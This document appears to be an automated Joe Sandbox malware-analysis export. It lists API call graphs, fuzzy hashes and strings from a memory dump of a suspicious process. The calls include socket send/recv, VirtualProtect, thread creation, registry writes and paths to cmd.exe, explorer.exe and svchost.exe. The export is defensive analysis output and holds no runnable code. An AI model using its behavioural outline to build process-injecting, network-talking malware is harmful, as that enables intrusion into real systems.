                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B44D2
                          • htons.WS2_32 ref: 011B44FF
                          • wsprintfA.USER32 ref: 011B4534
                            • Part of subcall function 011B4750: WSACreateEvent.WS2_32 ref: 011B4768
                            • Part of subcall function 011B4750: WSAEventSelect.WS2_32 ref: 011B478F
                            • Part of subcall function 011B4750: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                            • Part of subcall function 011B4750: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4578
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                            • Part of subcall function 011B4630: WSACreateEvent.WS2_32 ref: 011B4648
                            • Part of subcall function 011B4630: WSAEventSelect.WS2_32 ref: 011B466F
                            • Part of subcall function 011B4630: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                            • Part of subcall function 011B4630: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B45BB
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          • und_memcpy.LIBCMTD ref: 011B45F9
                          • LocalFree.KERNEL32 ref: 011B4603
                          • LocalFree.KERNEL32 ref: 011B4612
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpywsprintf
                          • String ID:
                          • API String ID: 3834521385-0
                          • Opcode ID: ca480580499e125196a7ef1158afeadfd1568d2c42ac1e082b87a86da38a7eca
                          • Instruction ID: 1acdfb9501472de9bc10875d974a7625c88dcc1589e97aea7a55f76424abf124
                          • Opcode Fuzzy Hash: ca480580499e125196a7ef1158afeadfd1568d2c42ac1e082b87a86da38a7eca
                          • Instruction Fuzzy Hash: 3941A576618B84C6CB549B1AE4C075ABBB0F789B94F509116EF8E83B29CB3DC485CF00
                          APIs
                          • _FF_MSGBANNER.LIBCMT ref: 011C0BD3
                            • Part of subcall function 011BEC1C: _set_error_mode.LIBCMT ref: 011BEC25
                            • Part of subcall function 011BEC1C: _set_error_mode.LIBCMT ref: 011BEC34
                            • Part of subcall function 011BE9BC: _set_error_mode.LIBCMT ref: 011BEA01
                            • Part of subcall function 011BE9BC: _set_error_mode.LIBCMT ref: 011BEA12
                            • Part of subcall function 011BE9BC: GetModuleFileNameW.KERNEL32 ref: 011BEA74
                            • Part of subcall function 011BE60C: ExitProcess.KERNEL32 ref: 011BE61B
                            • Part of subcall function 011C06CC: malloc.LIBCMT ref: 011C06F7
                            • Part of subcall function 011C06CC: Sleep.KERNEL32(?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C), ref: 011C070A
                          • _errno.LIBCMT ref: 011C0C15
                          • _lock.LIBCMT ref: 011C0C29
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C,?,?,00000000,011BADA3), ref: 011C0C3F
                          • free.LIBCMT ref: 011C0C4C
                          • _errno.LIBCMT ref: 011C0C51
                          • LeaveCriticalSection.KERNEL32(?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C,?,?,00000000,011BADA3), ref: 011C0C74
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                          • String ID:
                          • API String ID: 113790786-0
                          • Opcode ID: 2f8944b12a80035ce86664f26001b78c40556f4495f1295f9827a06761f7b46b
                          • Instruction ID: a1b3bd9c0c8f8e7d7a9f540d7fcd6ea15c77c7413c6630d92483a207a7e28089
                          • Opcode Fuzzy Hash: 2f8944b12a80035ce86664f26001b78c40556f4495f1295f9827a06761f7b46b
                          • Instruction Fuzzy Hash: 7F21C439A05742C2E72DAF25E8D47AA7364FBA8F88F05543DEA4A47790CF3CD4408359
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                          • String ID:
                          • API String ID: 3065580769-0
                          • Opcode ID: 8bb7e0b0bc2b2b624155ecf4ed186a6d852528b2306715bfc9ae6f26d54f369d
                          • Instruction ID: 0f494a1c8e0717b1cc79b406c34357a9b7b6dfd9a861492963b8df979e0d3008
                          • Opcode Fuzzy Hash: 8bb7e0b0bc2b2b624155ecf4ed186a6d852528b2306715bfc9ae6f26d54f369d
                          • Instruction Fuzzy Hash: 38A1BB7660A6C19BE7B5CB19E5917EBB7A0E7C9340F008025EBC98BB58EB3CD5448F41
                          APIs
                          • GetStartupInfoW.KERNEL32 ref: 011BF3B9
                            • Part of subcall function 011C074C: Sleep.KERNEL32(?,?,00000000,011BAD47,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011C0791
                          • GetFileType.KERNEL32 ref: 011BF524
                          • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 011BF562
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                          • String ID:
                          • API String ID: 3473179607-0
                          • Opcode ID: f64f8010170075157073f0d416bcd48fd15ffc51d2c9a4094638c0bc8e013f0e
                          • Instruction ID: 839613e853f535cae55fd132cfee3902839586250a93ea6002e33ae9fde01b3e
                          • Opcode Fuzzy Hash: f64f8010170075157073f0d416bcd48fd15ffc51d2c9a4094638c0bc8e013f0e
                          • Instruction Fuzzy Hash: A0818F72301B8686EB189F29D8847997BA1F744B78F588329CB7A433E5EB38C056C745
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID: d
                          • API String ID: 2857295742-2564639436
                          • Opcode ID: 4558024651b9797c860b064116df33477591bce0c340a5d85cdc73ea92fb8f89
                          • Instruction ID: 0806d30361654aa8c215e91f87c97c43e55fea07dbf0837f3591a42228cb07f7
                          • Opcode Fuzzy Hash: 4558024651b9797c860b064116df33477591bce0c340a5d85cdc73ea92fb8f89
                          • Instruction Fuzzy Hash: 9B71EE32305A4081EF78DB09F4D53B5A7A1F7E8709F911626A64E867B4EF3CC256C704
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B4340
                          • htons.WS2_32 ref: 011B436D
                            • Part of subcall function 011B4750: WSACreateEvent.WS2_32 ref: 011B4768
                            • Part of subcall function 011B4750: WSAEventSelect.WS2_32 ref: 011B478F
                            • Part of subcall function 011B4750: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                            • Part of subcall function 011B4750: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B43C0
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                            • Part of subcall function 011B4630: WSACreateEvent.WS2_32 ref: 011B4648
                            • Part of subcall function 011B4630: WSAEventSelect.WS2_32 ref: 011B466F
                            • Part of subcall function 011B4630: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                            • Part of subcall function 011B4630: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4405
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          • und_memcpy.LIBCMTD ref: 011B4443
                          • LocalFree.KERNEL32 ref: 011B444D
                          • LocalFree.KERNEL32 ref: 011B445C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                          • String ID:
                          • API String ID: 2815282806-0
                          • Opcode ID: d1bf51ab6c0d8116abc62b867c138b0cedf2298b0cd6c7900fbeb20330e2b05e
                          • Instruction ID: 228911cedea9635adc36bd39225d89dbdb223c3200418ba48bf7f1e26822d9f3
                          • Opcode Fuzzy Hash: d1bf51ab6c0d8116abc62b867c138b0cedf2298b0cd6c7900fbeb20330e2b05e
                          • Instruction Fuzzy Hash: 6541B77A618B8486CB54DB1AE48075ABBB0F7C9B94F508016EF9E43B69CB3EC445CF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID: d
                          • API String ID: 738346648-2564639436
                          • Opcode ID: 5d8e8d8922dab83100b61e2e3f350e8ac7584528af8499e656fb4ee1fa77a34e
                          • Instruction ID: 0ba83c117a0664a4a3288885afb4f4ccc7efef25bac3cbd2a1d0ab1661142d75
                          • Opcode Fuzzy Hash: 5d8e8d8922dab83100b61e2e3f350e8ac7584528af8499e656fb4ee1fa77a34e
                          • Instruction Fuzzy Hash: F241A536208BC4C5DB78CB19F48439AB7A0F7C9B84F41412ADA9E47B68CF78C495CB41
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 1af85ed40ec5fe5925729e172f13b0619eafdd898deb4fdde66c2bcd196ed5c7
                          • Instruction ID: 4891d3be781abf40b88bba6e1d7efba37e1cdb0be7fef878a29acac80d8b9ae3
                          • Opcode Fuzzy Hash: 1af85ed40ec5fe5925729e172f13b0619eafdd898deb4fdde66c2bcd196ed5c7
                          • Instruction Fuzzy Hash: 7111363231064765D60E6F35EDC03EE7A50AB94BB6F4A1319EE360B3D1DB3884438761
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: f916ec779f3b3909533c4aee4f8641efd325b308d98421a274a97015631c8405
                          • Instruction ID: 43207f0d192420a6e5db6e2fd3a243a88753d0f8aa9925b2628d6c6a93bc5009
                          • Opcode Fuzzy Hash: f916ec779f3b3909533c4aee4f8641efd325b308d98421a274a97015631c8405
                          • Instruction Fuzzy Hash: E111273231064196D30E6F68ED803AEBA50ABA4FE6F4A4108EA150B391CB78C8818761
                          APIs
                          • _errno.LIBCMT ref: 011C30B9
                          • FlushFileBuffers.KERNEL32(?,00000000,00000000,011C2B4A,?,?,00000001,011C2BF3,?,?,?,?,?,011C0349), ref: 011C311C
                          • GetLastError.KERNEL32(?,00000000,00000000,011C2B4A,?,?,00000001,011C2BF3,?,?,?,?,?,011C0349), ref: 011C3126
                          • __doserrno.LIBCMT ref: 011C3136
                          • _errno.LIBCMT ref: 011C313D
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno
                          • String ID:
                          • API String ID: 1845094721-0
                          • Opcode ID: eaa48e95c07d106bc380b8e278254a3f1cd83a11f50f2ee3ca91b8f95065ff35
                          • Instruction ID: b2d2f02a5ef89d05366f609a0f59c092e87d11857fb6e2dd8c283a9faacdab99
                          • Opcode Fuzzy Hash: eaa48e95c07d106bc380b8e278254a3f1cd83a11f50f2ee3ca91b8f95065ff35
                          • Instruction Fuzzy Hash: A911D3317106854AD71E6FB8E9D43AE6A71BBE0F94F09812CDB2607391DB788841C755
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: 773c676cbaad17fd7ccffa4336c236bbeb90efe55f47f68eeb1bf6bdf8e8be71
                          • Instruction ID: d24861dc185d63067825fd97a6b546285277ebd336fb92ea1d946371858e4bf4
                          • Opcode Fuzzy Hash: 773c676cbaad17fd7ccffa4336c236bbeb90efe55f47f68eeb1bf6bdf8e8be71
                          • Instruction Fuzzy Hash: 1611273262028556E31E6F35E9C43AEAA51BBA0FA1F99862CD63A077D1CB788441C724
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: fb08c3f44cab8cb537ddc1caec5fd8c485336597aab209f4fa5d9c0564146e40
                          • Instruction ID: 22681508df078266166273e6ab45af81c0fabfb2bf9537cebcfc6be9189ee93a
                          • Opcode Fuzzy Hash: fb08c3f44cab8cb537ddc1caec5fd8c485336597aab209f4fa5d9c0564146e40
                          • Instruction Fuzzy Hash: BD21B436618A8087E718DF29F49839AB7B0F3C57A4F600215EB9947BA8CF7DC855CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: b3b551aaca53fccd4ae67340d2bdd3b7548046abc673dd5a7dd6b9128e2609e2
                          • Instruction ID: e5f2539672c8002f2a16baea140a1c7452bc16d658c6fea7645038511a8b9af5
                          • Opcode Fuzzy Hash: b3b551aaca53fccd4ae67340d2bdd3b7548046abc673dd5a7dd6b9128e2609e2
                          • Instruction Fuzzy Hash: 6B21A736219A4483D718AF59F45435ABBB0F7C57A4F500629EB9983BA8DF7DC445CF00
                          APIs
                          • GetWindowsDirectoryW.KERNEL32 ref: 011A2253
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • GetSystemDirectoryW.KERNEL32 ref: 011A2295
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Directory$SystemWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                          • API String ID: 3092845267-3707798339
                          • Opcode ID: 46e7bb4ff8f1aebdfd4eb7e0c7df188c2aa70b52b7c59ab06d928eab087db82e
                          • Instruction ID: a17700f7b862af972b6ab736ee2bcdfd15393ae1eebd7980d62c5758d8932eb7
                          • Opcode Fuzzy Hash: 46e7bb4ff8f1aebdfd4eb7e0c7df188c2aa70b52b7c59ab06d928eab087db82e
                          • Instruction Fuzzy Hash: 1911217561C685C3EB0CDB51E8803DA6B64F7D6758F504026FB8757A58CB7CC881CB91
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegOpenKeyW.ADVAPI32 ref: 0119474E
                          • RegSetValueExW.ADVAPI32 ref: 01194789
                          • RegCloseKey.ADVAPI32 ref: 01194798
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
